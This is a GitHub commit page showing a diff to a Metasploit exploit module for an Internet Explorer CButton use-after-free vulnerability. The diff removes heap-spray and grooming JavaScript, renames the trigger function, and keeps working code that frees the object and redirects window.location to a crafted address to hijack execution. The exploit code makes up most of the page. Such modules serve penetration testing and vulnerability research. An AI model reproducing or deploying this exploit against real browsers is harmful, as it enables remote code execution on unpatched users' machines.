Permalink
Browse files

Your def of commit apparently is a little different than mine, git.

  • Loading branch information...
1 parent 2b3f7c4 commit f7543e18fe735bf50f9b4127eec6dd74c0f2d2bd @sinn3r sinn3r committed Dec 31, 2012
Showing with 3 additions and 34 deletions.
  1. +3 −34 modules/exploits/windows/browser/ie_cbutton_uaf.rb
View
37 modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
- 'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
+ 'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CButton object is freed, but a reference
@@ -187,37 +187,11 @@ def load_exploit_html(my_target, cli)
<script>
#{js}
- function exploit()
+ function helloWorld()
{
var e0 = null;
var e1 = null;
var e2 = null;
- var arrObject = new Array(3000);
- var elmObject = new Array(500);
- for (var i = 0; i < arrObject.length; i++)
- {
- arrObject[i] = document.createElement('div');
- arrObject[i].className = unescape("ababababababababababababababababababababa");
- }
-
- for (var i = 0; i < arrObject.length; i += 2)
- {
- arrObject[i].className = null;
- }
-
- CollectGarbage();
-
- for (var i = 0; i < elmObject.length; i ++)
- {
- elmObject[i] = document.createElement('button');
- }
-
- for (var i = 1; i < arrObject.length; i += 2)
- {
- arrObject[i].className = null;
- }
-
- CollectGarbage();
try {
e0 = document.getElementById("a");
@@ -230,19 +204,14 @@ def load_exploit_html(my_target, cli)
e2.appendChild(document.createElement('body'));
} catch(e) { }
CollectGarbage();
- for(var i =0; i < 20; i++)
- {
- arrObject[i].className = unescape("ababababababababababababababababababababa");
- }
var eip = window;
var data = "#{Rex::Text.rand_text_alpha(41)}";
eip.location = unescape("%u0b30%u0c0c" + data);
-
}
</script>
</head>
- <body onload="eval(exploit())">
+ <body onload="eval(helloWorld())">
<form id="a">
</form>
<dfn id="b">

0 comments on commit f7543e1

Please sign in to comment.